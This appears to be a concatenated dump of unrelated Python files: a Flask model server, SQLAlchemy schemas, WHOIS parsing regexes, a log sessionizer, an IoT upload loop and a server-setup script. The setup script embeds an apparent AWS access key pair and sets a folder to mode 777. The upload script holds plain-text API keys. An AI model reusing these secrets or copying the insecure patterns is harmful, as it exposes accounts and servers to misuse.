with open('features.pkl', 'rb') as m:
features = pickle.load(m)
@app.route("/")
def index():
return 'Server is up and running!'
@app.route("/predict",methods=['GET','POST'])
def predict():
json_data = request.get_json()
if not all(k in json_data for k in ["hp","age","km","model"]):
return "Not enough data for the prediction"
df = pd.DataFrame.from_dict([json_data])
df = pd.get_dummies(df).reindex(columns=features,fill_value=0)
prediction = model.predict(df)
return str(prediction[0])
app.run()
|
998,160 | d779c5f1b1fdc19b1ae5006cf0eed836c0701a87 | import sys
from collections import deque
def input(): return sys.stdin.readline().strip()
def main():
"""
Nを-2べきで展開したときの末端項がmod 2で決定できるから
末尾から再帰的に桁が決められたのか。。。
"""
N = int(input())
if N == 0:
print(0)
return
idx = 0
ans = deque([])
while N != 0:
if N % 2 == 0:
ans.appendleft(0)
if N % 2 != 0:
ans.appendleft(1)
N -= (-1) ** idx
N //= 2
idx += 1
print("".join(map(str, ans)))
if __name__ == "__main__":
main()
|
998,161 | a061a06e3209f6705b1fe949a600d860be1f98d9 | from .base import Base
from app.db import db
class PastPerformance(Base):
__tablename__ = 'past_performances'
__table_args__ = (
db.Index(
'_horse_track_date',
'horse_id',
'track_code',
'race_date'
),
db.UniqueConstraint(
'horse_id',
'track_code',
'race_date',
name='uniq_horse_track_date'
)
)
id = db.Column(db.Integer, primary_key=True)
# Relationships
horse_id = db.Column(db.Integer, db.ForeignKey('horses.id'))
horse = db.relationship("Horse", back_populates="past_performances")
horse_name = db.Column(db.String)
foreign_or_domestic = db.Column(db.String)
foreign_race = db.Column(db.String)
race_date = db.Column(db.Date)
track_code = db.Column(db.String)
race_number = db.Column(db.Integer)
surface = db.Column(db.String)
timeform_code = db.Column(db.String)
inner_track_code = db.Column(db.String)
distance = db.Column(db.DECIMAL)
race_class = db.Column(db.String)
claim_price = db.Column(db.DECIMAL)
purse = db.Column(db.DECIMAL)
track_condition = db.Column(db.String)
sex_restrictions = db.Column(db.String)
age_restrictions = db.Column(db.String)
state_bred = db.Column(db.String)
field_size = db.Column(db.Integer)
first_fraction = db.Column(db.DECIMAL)
second_fraction = db.Column(db.DECIMAL)
third_fraction = db.Column(db.DECIMAL)
fourth_fraction = db.Column(db.DECIMAL)
fifth_fraction = db.Column(db.DECIMAL)
sixth_fraction = db.Column(db.DECIMAL)
final_time = db.Column(db.DECIMAL)
first_horse = db.Column(db.String)
second_horse = db.Column(db.String)
third_horse = db.Column(db.String)
grade = db.Column(db.Integer)
post_position = db.Column(db.Integer)
first_call_position = db.Column(db.Integer)
first_call_lengths_back = db.Column(db.DECIMAL)
first_call_position = db.Column(db.Integer)
first_call_lengths_back = db.Column(db.DECIMAL)
first_call_position = db.Column(db.Integer)
first_call_lengths_back = db.Column(db.DECIMAL)
second_call_position = db.Column(db.Integer)
second_call_lengths_back = db.Column(db.DECIMAL)
third_call_position = db.Column(db.Integer)
third_call_lengths_back = db.Column(db.DECIMAL)
fourth_call_position = db.Column(db.Integer)
fourth_call_lengths_back = db.Column(db.DECIMAL)
stretch_call_position = db.Column(db.Integer)
stretch_call_lengths_back = db.Column(db.DECIMAL)
final_call_position = db.Column(db.Integer)
final_call_lengths_back = db.Column(db.DECIMAL)
beyer_or_foreign_speed = db.Column(db.Integer)
comment = db.Column(db.String)
odds = db.Column(db.DECIMAL)
odds_position = db.Column(db.Integer)
claimed_code = db.Column(db.String)
lasix = db.Column(db.String)
bute = db.Column(db.String)
blinkers = db.Column(db.String)
bandages = db.Column(db.String)
jockey = db.Column(db.String)
trainer = db.Column(db.String)
track_variant = db.Column(db.Integer)
speed_rating = db.Column(db.Integer)
breed = db.Column(db.String)
owner = db.Column(db.String)
def __repr__(self):
return "<PastPerformance(id='%s' horse_id='%s')>" % (
self.id, self.horse_id)
|
998,162 | aabbd5a2f2bbdf011c60694f2722c7bd2ed1d8ed | '''
See examples.py, constants.py, or main.py for configurable code.
'''
def clamp(value, min_value, max_value):
return min(max_value, max(min_value, value))
def smoothstep(min_edge, max_edge, value):
value = clamp((value-min_edge) / (max_edge-min_edge), 0, 1)
return value * value * (3 - 2 * value)
import random
def random_color():
''' generates a tuple with 3 components in the range [0,255] '''
return [
random.randint(0, 255)
for _ in range(3)
]
def toColor(V):
return tuple(
clamp(c, 0, 255)
for c
in (V.x, V.y, V.z)
)
class Traversable:
'''
a convenience class for classes that represent
any 2D space that allows iteration over the x-
y-axes and also every point.
the class should extent Traversable and provide min
and max x- and y- coordinates.
'''
def __init__(self, minx=0, miny=0, maxx=0, maxy=0):
self.minx = minx
self.maxx = maxx
self.miny = miny
self.maxy = maxy
def min_xcor(self):
return self.minx
def max_xcor(self):
return self.maxx
def min_ycor(self):
return self.miny
def max_ycor(self):
return self.maxy
def xcors(self):
return range(self.min_xcor(), self.max_xcor())
def ycors(self):
return range(self.min_ycor(), self.max_ycor())
def cors(self):
for y in self.ycors():
for x in self.xcors():
yield x, y
|
998,163 | c6d4cc1e52cd9db8bff2e588b3b9d5d178d4a79d | #! /usr/bin/env python
print "Configure Server Started!!!"
from shutil import copy, copytree, move
import subprocess
#the copy and copytree methods can help you move stuff out of your expanded package to various places on the server.
#subprocess.call(["rm /var/www/html/test.py",""], shell=True)
#subprocess.call(["rmdr /var/www/html",""], shell=True)
#subprocess.call(["apachectl -k stop",""], shell=True)
move("/home/root/project-code/AppServer/httpd.conf", "/etc/httpd/conf")
subprocess.call(["mkdir /var/www/styles",""], shell=True)
#subprocess.call(["apachectl -k start",""], shell=True)
copytree("/home/root/project-code/AppServer", "/var/www/python")
subprocess.call(["mkdir /var/www/python/files",""], shell=True)
subprocess.call(["chmod 777 /var/www/python/files",""], shell=True)
subprocess.call(["yum install -y python-json",""], shell=True)
subprocess.call(["yum install -y python-imaging",""], shell=True)
#executing commandline calls can be done with the subprocess module
subprocess.call(["apachectl -k start",""], shell=True)
#Register with load balancer
from subprocess import Popen, PIPE
cmd = 'curl -s http://169.254.169.254/latest/meta-data/instance-id'
arglist = cmd.split()
instance_id = Popen(arglist, stdout=PIPE).communicate()[0]
from boto.ec2.elb import ELBConnection
conn = ELBConnection('AKIAJHJXHTMTVQYVZJOA','2YVZfFXQ7mhdFeUnMjcMOJ8uc5GBjz5LXhmh8LiM')
lbs = conn.get_all_load_balancers()
conn.register_instances('appserver-lb', [instance_id])
#make sure to start any services required for this server.
print "Configure Server Complete"
|
998,164 | 06d008c5a3fb04c1a0297d632c38f6dc1bf3f5f7 | import random
import numpy as np
from cs231n.data_utils import load_CIFAR10
import matplotlib.pyplot as plt
plt.rcParams['figure.figsize'] = (10.0, 8.0)
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
cifar10_dir = 'cifar-10-batches-py'
X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)
print('Training data shape', X_train.shape)
print('Training labels shape', y_train.shape)
print('Test data shape', X_test.shape)
print('Test labels shape', y_test.shape)
classes = ['plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
num_classes = len(classes)
sample_per_class = 7
for y, cls in enumerate(classes):
idxs = np.flatnonzero(y_train == y)
idxs = np.random.choice(idxs, sample_per_class, replace=False)
for i, idx in enumerate(idxs):
plt_idx = i * num_classes + y + 1
plt.subplot(sample_per_class, num_classes, plt_idx)
plt.imshow(X_train[idx].astype('uint8'))
plt.axis('off')
if i == 0:
plt.title(cls)
plt.show() |
998,165 | c419aceacc79e28cc296f40a1cef14753f0c67df | import csv
import datetime
import time
import os
dirpath = os.getcwd()
print("current directory is : " + dirpath)
path_to_file = './input/'
os.chdir(path_to_file)
print("current directory is : " + os.getcwd())
# get inactivity period from .txt
inactivity_period_file = open('inactivity_period.txt', mode='r')
inactivity_period = int(inactivity_period_file.read())
# datastructure that holds info from the input file
info = {}
# convert HH:MM:SS to seconds
def get_sec(time_str):
# print(time_str)
h, m, s = time_str.split(':')
return int(h) * 3600 + int(m) * 60 + int(s)
# check if IP exists in the previous time frame, if it exists save IP information and
# remove from the previous time
def check_if_ip_exists_before(cur_time, inact_time, ip, new_ip_time_data):
global info
for t in range(cur_time - 1, cur_time - inact_time - 1, -1):
if t >= 0:
if t in info and ip in info[t]:
new_ip_time_data['old datetime'] = info[t][ip]['old datetime']
new_ip_time_data['doc'] = info[t][ip]['doc'] + 1
info[t].pop(ip)
return new_ip_time_data
# if time already exists, write new IP address information if IP is not there, else update doc
def copy_data_IP(cur_time, inact_time, ip, new_ip_time_data):
# if IP exists in the current time, update number of documents
global info
if ip in info[cur_time]:
new_ip_time_data['doc'] = new_ip_time_data['doc'] + 1
else:
new_ip_time_data = check_if_ip_exists_before(cur_time, inact_time, ip, new_ip_time_data)
return new_ip_time_data
# convert 2017-06-30 00:00:00 to epoch, so that it's feasible to keep track of inactivity_period
def convert_datetime_to_ecoch(my_time):
my_format = "%Y-%m-%d %H:%M:%S"
epoch = int(time.mktime(time.strptime(my_time, my_format)))
return epoch
# convert epoch to date time, this is useful when writing the information to output file
def convert_epoch_to_datetime(ts_epoch):
ts = datetime.datetime.fromtimestamp(ts_epoch).strftime('%Y-%m-%d %H:%M:%S')
return ts
# find expired sessions and delete it from dictionary
def print_and_delete_expired_session(cur_time_in_sec, inactivity_period, f):
output = ""
expired_timel = []
global info
for t in info.keys():
if (cur_time_in_sec - t) > inactivity_period:
for ip in info[t].keys():
output = ip
olddatetime = info[t][ip]['old datetime']
datetime = info[t][ip]['datetime']
duration = datetime - olddatetime + 1
doc = info[t][ip]['doc']
output = output + "," + convert_epoch_to_datetime(olddatetime) + "," + convert_epoch_to_datetime(
datetime) + "," + str(duration) + "," + str(doc)
# write to file
# print(output)
f.write(output + "\n")
expired_timel.append(t)
# delete inactive time records
for t_to_pop in expired_timel:
info.pop(t_to_pop)
# take corresponding column values from a row
def take_info_from_row(row, ip_index, date_index, time_index):
global info
ip = row[ip_index]
date = row[date_index]
# date = datetime.datetime.strptime(date, '%m/%d/%y').strftime('%Y-%m-%d')
time = row[time_index]
my_time = date + " " + time
doc = 1
new_ip_time_data_epoch = {
'old datetime': convert_datetime_to_ecoch(my_time),
'datetime': convert_datetime_to_ecoch(my_time),
'doc': doc}
return ip, new_ip_time_data_epoch
# add the row information from csv to dictionary
def add_to_dict(row, ip_index, date_index, time_index, inactivity_period, f):
global info
ip, new_ip_time_data = take_info_from_row(row, ip_index, date_index, time_index)
cur_time_in_sec = new_ip_time_data['datetime']
# if current time is in the dictionary,
# 1. check if current IP reading is in the current time
# 2. check if current IP reading is in the previous time
if cur_time_in_sec in info:
new_ip_time_data = copy_data_IP(cur_time_in_sec, inactivity_period, ip, new_ip_time_data)
info[cur_time_in_sec][ip] = new_ip_time_data
# if current time is not in the dictionary,
# 1. check if the current IP reading is in the previous time
else:
new_ip_time_data = check_if_ip_exists_before(cur_time_in_sec, inactivity_period, ip, new_ip_time_data)
info[cur_time_in_sec] = {ip: new_ip_time_data}
# print and delete expired record
print_and_delete_expired_session(cur_time_in_sec, inactivity_period, f)
# once it finishes reading all rows from csv, and
# if dictionary is not empty, print it out in instructed order
def print_remaining(info):
sort_this_dict = {}
# convert dictionary to list
for t, value in info.items():
sort_this_dict = {**sort_this_dict, **value}
# sort the list by first accessed date and last accessed date
dr = sorted(sort_this_dict.items(), key=lambda dct: (dct[1]['old datetime'], dct[1]['datetime']))
print_from_list(dr, f)
# printing sorted remaining information
def print_from_list(dr, f):
output = ""
for i in range(0, len(dr)):
row = dr[i]
ip = row[0]
output = ip
olddatetime = row[1]['old datetime']
datetime = row[1]['datetime']
duration = datetime - olddatetime + 1
doc = row[1]['doc']
output = output + "," + convert_epoch_to_datetime(olddatetime) + "," + convert_epoch_to_datetime(
datetime) + "," + str(duration) + "," + str(doc)
# write to file
f.write(output + "\n")
# print(output)
# read csv file line by line and get Time as key,
# value is in list that includes all IP addresses that accessed at the Time
with open('log.csv', mode='r', encoding='utf-8-sig') as infile:
reader = csv.reader(infile)
headers = next(reader)
ip_index = headers.index("ip")
date_index = headers.index("date")
time_index = headers.index("time")
path_to_file = '../output/'
os.chdir(path_to_file)
f = open('sessionization.txt', 'w')
# read each row
for row in reader:
add_to_dict(row, ip_index, date_index, time_index, inactivity_period, f)
# print(info)
if bool(info):
print_remaining(info)
f.close()
|
998,166 | 9c959fac06208eb7724c4897e062c390c302733e |
from flask_sqlalchemy import SQLAlchemy
from flask_marshmallow import Marshmallow
from marshmallow_sqlalchemy import SQLAlchemyAutoSchema
import datetime
db = SQLAlchemy()
class Libro(db.Model):
id = db.Column(db.Integer, primary_key = True)
titulo = db.Column( db.String(50) )
autor = db.Column( db.String(50) )
genero = db.Column( db.String(50) )
prestamos = db.relationship("Prestamo", backref='libro', lazy=True)
class Prestamo(db.Model):
id = db.Column(db.Integer, primary_key = True)
fecha = db.Column(db.DateTime)
dias = db.Column(db.Integer)
libro_id = db.Column(db.Integer, db.ForeignKey('libro.id'))
usuario_id = db.Column(db.Integer, db.ForeignKey('usuario.id'))
class Usuario(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(50), unique=True, nullable=False)
contrasena = db.Column(db.String(50), nullable=False)
prestamos = db.relationship("Prestamo", backref='usuario', cascade='all, delete, delete-orphan', lazy=True)
class LibroSchema(SQLAlchemyAutoSchema):
class Meta:
model = Libro
include_relationships = True
load_instance = True
class PrestamoSchema(SQLAlchemyAutoSchema):
class Meta:
model = Prestamo
include_fk = True
load_instance = True
class UsuarioSchema(SQLAlchemyAutoSchema):
class Meta:
model = Usuario
include_relationships = True
load_instance = True
|
998,167 | 8c237bdb7868c7b7868a35237a5080a2ce00e1b7 | #coding=utf-8
#####################################################
# Written By lsvih #
# 2016-11-07 #
# Convert algebraic expression #
# to functional expression #
#####################################################
from data import Stack
from data import BiTree
import sys
operators = {'(': 0, ')': 0, '+': 1, '-': 1, '*': 2, '/': 2, '^': 3}
operators_name = {'+':'add','-':'mius','*':'muilt','/':'divide','^':'power'}
def break_word(Exp):
for op in operators:
Exp = Exp.replace(op,'|'+op+'|')
Exp = Exp.split('|')
return [item for item in Exp if not item is ""]
def clear_brackets(exp):
exp = break_word(exp)
temp = Stack()
result = Stack()
for elem in exp:
if elem not in operators:
result.push(elem)
else:
if temp.length() is 0 or elem is '(':
temp.push(elem)
else:
if elem is ')':
while temp.getTop() is not '(':
result.push(temp.pop())
temp.pop()
elif operators[elem] < operators[temp.getTop()]:
while temp.length() is not 0:
if temp.getTop() is '(':
break
result.push(temp.pop())
temp.push(elem)
else:
temp.push(elem)
while temp.length() is not 0:
result.push(temp.pop())
return result
def expression_tree(Exp):
origin = clear_brackets(Exp)
temp = Stack()
stack = Stack()
while origin.length() is not 0: stack.push(origin.pop())
while stack.length() is not 0:
if stack.getTop() in operators:
node = BiTree(stack.pop())
node.right = temp.pop()
node.left = temp.pop()
else:
node = BiTree(stack.pop())
temp.push(node)
return temp.pop()
def create_function_expression(Tree):
if Tree.value in operators_name:
Tree.value = operators_name[Tree.value] +'('+ create_function_expression(Tree.left) +','+ create_function_expression(Tree.right) +')'
return Tree.value
if len(sys.argv) is 1:
print "Usage:f2f.py {your expression}"
print 'example:f2f.py "A+b-x*(12.13+51^y)^1.4121"'
else:
print "input:"+sys.argv[1]
print "output:"+create_function_expression(expression_tree(sys.argv[1]))
|
998,168 | 1bb70e84949fa3c86f2de52b817879f035e527c4 | import setuptools
setuptools.setup(
name='seleniumslicer',
version='0.0.1',
author='Feng Liu',
author_email='feng3245@gmail.com',
description='Given selenium drive and elements. Extract the element screen capture',
long_description='Given a driver and an element on the page save the element to the file name of your chosing',
long_description_content_type="text/markdown",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",]
)
|
998,169 | 4fd746e39f5735f234cf057ee9ddfd27b543c432 |
roots = {
'com': {
'extend': None,
'domain_name': r'Domain Name:\s?(.+)',
'registrar': r'Registrar:\s?(.+)',
'registrant': None,
'creation_date': r'Creation Date:\s*(.+)\s*',
'expiration_date': r'Expiration Date:\s*(.+)\s*',
'updated_date': r'Updated Date:\s*(.+)\s*',
'name_servers': r'Name Server:\s*(.+)\s*',
'status': r'Status:\s?(.+)',
'emails': r'[\w.-]+@[\w.-]+\.[\w]{2,4}',
},
'net': {
'extend': 'com',
},
'org': {
'extend': 'com',
'creation_date': r'\nCreated On:\s*(.+)\s*',
'expiration_date': r'\nRegistry Expiry Date:\s?(.+)',
'updated_date': r'\nLast Updated On:\s*(.+)\s*',
'name_servers': r'Name Server:\s?(.+)\s*',
},
'edu': {
'extend': 'com',
'creation_date': r'Domain record activated:\s+(.+)',
'expiration_date': r'Domain expires:\s+(.+)',
'updated_date': r'Domain record last updated:\s+(.+)',
},
'uk': {
'extend': 'com',
'registrant': r'Registrant:\n\s*(.+)',
'creation_date': r'Registered on:\s*(.+)',
'expiration_date': r'Renewal date:\s*(.+)',
'updated_date': r'Last updated:\s*(.+)',
'name_servers': r'Name Servers:\s*(.+)\s*',
'status': r'Registration status:\n\s*(.+)',
},
'pl': {
'extend': 'uk',
'creation_date': r'\ncreated:\s*(.+)\n',
'updated_date': r'\nlast modified:\s*(.+)\n',
'name_servers': r'\nnameservers:\s*(.+)\n\s*(.+)\n',
'status': r'\nStatus:\n\s*(.+)',
},
'ru': {
'extend': 'com',
'domain_name': r'\ndomain:\s*(.+)',
'creation_date': r'\ncreated:\s*(.+)',
'expiration_date': r'\npaid-till:\s*(.+)',
'updated_date': r'\nLast updated on\s*(.+)',
'name_servers': r'\nnserver:\s*(.+)',
'status': r'\nstate:\s*(.+)',
},
'ru_rf': {
'extend': 'com',
'domain_name': r'\ndomain:\s*(.+)',
'creation_date': r'\ncreated:\s*(.+)',
'expiration_date': r'\npaid-till:\s*(.+)',
'name_servers': r'\nnserver:\s*(.+)',
'status': r'\nstate:\s*(.+)',
},
'su': {
'extend': 'ru',
},
'lv': {
'extend': 'ru',
'creation_date': r'Registered:\s*(.+)\n',
'updated_date': r'Changed:\s*(.+)\n',
'status': r'Status:\s?(.+)',
},
'jp': {
'domain_name': r'\[Domain Name\]\s?(.+)',
'registrar': None,
'registrant': r'\[Registrant\]\s?(.+)',
'creation_date': r'\[Created on\]\s*(.+)\n',
'expiration_date': r'\[Expires on\]\s*(.+)\n',
'updated_date': r'\[Last Update\]\s*(.+)\n',
'name_servers': r'\[Name Server\]\s*(.+)',
'status': r'\[Status\]\s?(.+)',
'emails': r'[\w.-]+@[\w.-]+\.[\w]{2,4}',
},
'co_jp': {
'extend': 'jp',
'creation_date': r'\[Registered Date\]\s?(.+)',
'expiration_date': r'\[State\].+\((.+)\)',
},
'de': {
'extend': 'com',
'domain_name': r'\ndomain:\s*(.+)',
'updated_date': r'\nChanged:\s?(.+)',
'name_servers': r'Nserver:\s*(.+)',
},
'at': {
'extend': 'com',
'domain_name': r'domain:\s?(.+)',
'updated_date': r'changed:\s?(.+)',
'name_servers': r'nserver:\s*(.+)',
},
'eu': {
'extend': 'com',
'domain_name': r'\ndomain:\s*(.+)',
'registrar': r'Name:\s?(.+)',
},
'biz': {
'extend': 'com',
'registrar': r'Sponsoring Registrar:\s?(.+)',
'registrant': r'Registrant Organization:\s?(.+)',
'creation_date': r'Creation Date:\s*(.+)\s*',
'expiration_date': r'Registry Expiry Date:\s*(.+)\s*',
'updated_date': r'Updated Date:\s*(.+)\s*',
'status': None,
},
'info': {
'extend': 'biz',
'creation_date': r'Created On:\s?(.+)',
'expiration_date': r'Expiration Date:\s?(.+)$',
'updated_date': r'Last Updated On:\s?(.+)$',
'status': r'Status:\s?(.+)',
},
'name': {
'extend': 'com',
'status': r'Domain Status:\s?(.+)',
},
'us': {
'extend': 'name',
},
'co': {
'extend': 'biz',
'status': r'Status:\s?(.+)',
},
'me': {
'extend': 'biz',
'creation_date': r'Creation Date:\s?(.+)',
'expiration_date': r'Expiry Date:\s?(.+)',
'updated_date': r'Updated Date:\s?(.+)',
'name_servers': r'Nameservers:\s?(.+)',
'status': r'Domain Status:\s?(.+)',
},
'be': {
'extend': 'pl',
'domain_name': r'\nDomain:\s*(.+)',
'registrar': r'Company Name:\n?(.+)',
'creation_date': r'Registered:\s*(.+)\n',
'status': r'Status:\s?(.+)',
},
'nz': {
'extend': None,
'domain_name': r'domain_name:\s?(.+)',
'registrar': r'registrar_name:\s?(.+)',
'registrant': r'registrant_contact_name:\s?(.+)',
'creation_date': r'domain_dateregistered:\s?(.+)',
'expiration_date': r'domain_datebilleduntil:\s?(.+)',
'updated_date': r'domain_datelastmodified:\s?(.+)',
'name_servers': r'ns_name_[0-9]{2}:\s?(.+)',
'status': r'query_status:\s?(.+)',
'emails': r'[\w.-]+@[\w.-]+\.[\w]{2,4}',
},
'cz': {
'extend': 'com',
'domain_name': r'Domain:\s?(.+)',
'registrar': r'registrar:\s?(.+)',
'registrant': r'registrant:\s?(.+)',
'creation_date': r'registered:\s?(.+)',
'expiration_date': r'expire:\s?(.+)',
'updated_date': r'changed:\s?(.+)',
'name_servers': r'nserver:\s*(.+) ',
},
'it': {
'extend': 'com',
'domain_name': r'Domain:\s?(.+)',
'registrar': r'Registrar:\s*Organization:\s*(.+)',
'registrant': r'Registrant:\s?Name:\s?(.+)',
'creation_date': r'Created:\s?(.+)',
'expiration_date': r'Expire Date:\s?(.+)',
'updated_date': r'Last Update:\s?(.+)',
'name_servers': r'Nameservers:\s?(.+)\s?(.+)\s?(.+)\s?(.+)',
'status': r'Status:\s?(.+)',
},
'fr': {
'extend': 'com',
'domain_name': r'domain:\s?(.+)',
'registrar': r'registrar:\s*(.+)',
'registrant': r'contact:\s?(.+)',
'creation_date': r'created:\s?(.+)',
'expiration_date': None,
'updated_date': r'last-update:\s?(.+)',
'name_servers': r'nserver:\s*(.+)',
'status': r'status:\s?(.+)',
},
'io': {
'extend': 'com',
'expiration_date': r'\nRegistry Expiry Date:\s?(.+)',
},
'br': {
'extend': 'com',
'domain_name': r'domain:\s?(.+)',
'registrar': 'nic.br',
'registrant': None,
'owner': r'owner:\s?(.+)',
'creation_date': r'created:\s?(.+)',
'expiration_date': r'expires:\s?(.+)',
'updated_date': r'changed:\s?(.+)',
'name_servers': r'nserver:\s*(.+)',
'status': r'status:\s?(.+)',
},
'ma': {
'extend': 'com',
'registrar': r'Registrar:\s?(.+)',
'registrant': r'Registrant Name:\s?(.+)',
'expiration_date': r'\nRegistry Expiry Date:\s?(.+)',
'status': r'Domain Status:\s?(.+)',
},
'tv': {
'extend': 'com',
'expiration_date': r'Registry Expiry Date:\s?(.+)',
},
'in': {
'extend': 'com',
'creation_date': r'Created On:\s*(.+)\s*',
'updated_date': r'Last Updated On:\s*(.+)\s*',
},
'qa': {
'extend': 'com',
'updated_date': r'Last Modified:\s+(.*)\n',
},
'om': {
'extend': 'qa',
},
'ir': {
'extend': 'br',
'domain_name': r'domain:\s?(.+)',
'creation_date': None,
'expiration_date': r'expire-date:\s?(.+)',
'updated_date': r'last-updated:\s?(.+)',
},
'tw': {
'extend': 'com',
'creation_date': r'Record created on (.+) \(YYYY-MM-DD\)',
'expiration_date': r'Record expires on (.+) \(YYYY-MM-DD\)',
},
'hk': {
'extend': 'com',
'creation_date': r'Domain Name Commencement Date:\s?(.+)',
'expiration_date': r'Expiry Date:\s?(.+)\s*',
},
'th': {
'extend': 'com',
'domain_name': r'Domain:\s*(.+)\s*',
'creation_date': r'Created date:\s*(.+)\s*',
'expiration_date': r'Exp date:\s*(.+)\s*',
'updated_date': r'Updated date:\s*(.+)\s*',
},
'tr': {
'extend': 'com',
'creation_date': r'Created on\.+:\s*(.+)\.',
'expiration_date': r'Expires on\.+:\s*(.+)\.',
},
'mx': {
'extend': 'com',
'creation_date': r'Created On:\s*(.+)\s*',
'updated_date': r'Last Updated On:\s*(.+)\s*',
},
'ch': {
'extend': 'com',
'creation_date': r'First registration date:\s*(.+)\s*',
'name_servers': r'Name servers:\s*(.+)(?:\s*(.+)(?:\s*(.+)(?:\s*(.+)(?:\s*(.+))?)?)?)?',
},
'dk': {
'extend': 'com',
'domain_name': r'Domain:\s*(.+)\s*',
'creation_date': r'Registered:\s*(.+)\s*',
'expiration_date': r'Expires:\s*(.+)\s*',
},
'fi': {
'extend': 'com',
'domain_name': r'domain\.+:\s*(.+)\s*',
'creation_date': r'created\.+:\s*(.+)\s*',
'expiration_date': r'expires\.+:\s*(.+)\s*',
'updated_date': r'modified\.+:\s*(.+)\s*',
},
'cn': {
'extend': 'com',
'creation_date': r'Registration Time:\s*(.+)\s*',
'expiration_date': r'Expiration Time:\s*(.+)\s*',
},
'rs': {
'extend': 'com',
'creation_date': r'Registration date:\s*(.+)\s*',
'updated_date': r'Modification date:\s*(.+)\s*',
},
'sk': {
'extend': 'cz',
'creation_date': r'Created:\s*(.+)\s*',
'expiration_date': r'Valid Until:\s*(.+)\s*',
'updated_date': r'Updated:\s*(.+)\s*',
'name_servers': r'Nameserver:\s*(.+)\s*',
},
'id': {
'extend': 'com',
'creation_date': r'Created On:(.+)\s*',
'expiration_date': r'Expiration Date:(.+)\s*',
'updated_date': r'Last Updated On:(.+)\s*',
},
'ua': {
'extend': 'com',
'domain_name': r'domain:\s*(.+)\s*',
'creation_date': r'created:\s*(.+)\s*',
'expiration_date': r'expires:\s*(.+)\s*',
'updated_date': r'modified:\s*(.+)\s*',
},
'il': {
'extend': 'com',
'domain_name': r'domain:\s*(.+)\s*',
'creation_date': r'validity:\s*(.+)\s*',
'expiration_date': None,
'updated_date': None,
'name_servers': r'nserver:\s*(.+)',
},
'cl': {
'extend': 'com',
'domain_name': r'(.+):\s*',
'creation_date': None,
'expiration_date': r'\(Expiration date\):\s*(.+)\s*',
'updated_date': None,
'name_servers': r'\(Domain servers\):\s*(.+)(?:\s*\(\d+\.\d+\.\d+\.\d+\)\s*)?\s*(?:(.+)\s*)?',
},
}
|
998,170 | a68e6cfcaeaaa3dc27788e9bd33e982691de41b4 | import pymysql
import datetime
from datetime import date, datetime, timedelta
import time
import urllib.request
import json
import urllib.parse
#Asumsi : Database main diisi oleh program di main server
write_api="ZK7J4CMO3WDQ7YTF"
read_api="C2LETLVY0NPLWBMT"
while True:
### MEREKUES DATA DARI DATABASE main SERVER ###
## Berhasil rekues data ##
try:
#Mengambil data dari database main yang belum dikirim ke main server(sent = 0)
#Membuka database main
connection_main = pymysql.connect(host='localhost',database='client',user='root',password='')
cursor_main=connection_main.cursor()
#Memberi syntax SQL untuk mengumpulkan data yang dibutuhkan dari tabel tabeldata
cursor_main.execute("select id, channel, created_at, field1, field2, field3, field4, field5, field6 from tabeldata where sent = 0;")
connection_main.commit()
#print("Rekues sukses, mempersiapkan pengiriman data")
### MENERIMA DATA ###
## Sukses menerima data ##
try:
#Mendeklarasikan variabel untuk masing - masing komponen
for row in cursor_main.fetchall():
idnya=str(row[0]) #rownya menyesuaikan
channel=str(row[1]) #rownya menyesuaikan
datetimeraw=row[2] #rownya menyesuaikan
datetime=urllib.parse.quote(str(datetimeraw))
datasatu=str(row[3]) #rownya menyesuaikan
datadua=str(row[4]) #rownya menyesuaikan
datatiga=str(row[5]) #rownya menyesuaikan
dataempat=str(row[6]) #rownya menyesuaikan
datalima=str(row[7]) #rownya menyesuaikan
dataenam=str(row[8]) #rownya menyesuaikan
entry_id=int(idnya)
#Menampilkan response data yang telah sukses direkues
print("Sukses merekues data tanggal %s untuk channel %s"%(datetimeraw, channel))
#opsional aja hehe
print(channel, datetime, datasatu, datadua, datatiga, dataempat, datalima, dataenam) #opsional hehe
### MENGIRIM DATA KE main SERVER ###
#Mengirimkan data via api
url = "https://api.thingspeak.com/update.json?api_key=%s&channel=2&created_at=%s&entry_id=%s&field1=%s&field2=%s&field3=%s&field4=%s&field5=%s&field6=%s"%(write_api, datetime, entry_id, datasatu, datadua, datatiga, dataempat, datalima, dataenam)
conn = urllib.request.urlopen(url)
### MENERIMA RESPON DARI main SERVER ###
#Mengubah respon menjadi str
data = json.loads(conn.read().decode('UTF-8'))
#Menampilkan respon
if data != 0:
print("Sukses mengirim data tanggal %s channel %s"%(datetimeraw, channel))
### MELAKUKAN UPDATE DI DATABASE main SERVER ###
#Memberi syntax SQL untuk mengupdate kolom sent (tagging) pada tabel tabeldata
cursor_main.execute("""update tabeldata set sent = 1 where id = %(idnya)s""", {'idnya':idnya})
connection_main.commit()
## Menampilkan respon berhasil update ##
print("Database main server berhasil diupdate")
else:
## Menampilkan respon berhasil update ##
print("Gagal mengirim ke main server, database main server tidak diupdate")
#Memberi batas perdata
print("-----------------")
## Apabila respon gagal (otomatis gagal update) ##
except urllib.error.HTTPError:
#Menampilkan response data yang gagal direkues
print("Gagal mengirim data, gagal tersambung ke main server. database tidak diupdate")
pass
#Memberi batas perdata
print("-----------------")
#Menutup koneksi main
connection_main.close()
## Gagal rekues data ##
except pymysql.OperationalError:
print("Gagal rekues data, tidak dapat tersambung ke database main server")
#Memberi batas
print("-----------------")
pass
## Memberi interrupt via keyboard ##
except KeyboardInterrupt:
break |
998,171 | 4926f2ce9ccc62178c89d3f5e150d52b7ff4ed77 | from parameterized import parameterized
from unittest import TestCase, mock
from insightconnect_plugin_runtime.exceptions import PluginException
from komand_active_directory_ldap.actions.disable_users import DisableUsers
from komand_active_directory_ldap.actions.disable_users.schema import Input, Output
from common import MockConnection
from common import MockServer
from common import default_connector
class TestActionDisableUsers(TestCase):
@parameterized.expand(
[
(
{Input.DISTINGUISHED_NAMES: ["CN=empty_search,DC=example,DC=com"]},
{
Output.FAILED: [
{
"dn": "CN=empty_search,DC=example,DC=com",
"error": "An error occurred during plugin "
"execution!\n"
"\n"
"The DN "
"CN=empty_search,DC=example,DC=com was "
"not found. Please provide a valid DN "
"and try again.",
}
],
Output.COMPLETED: [],
},
),
(
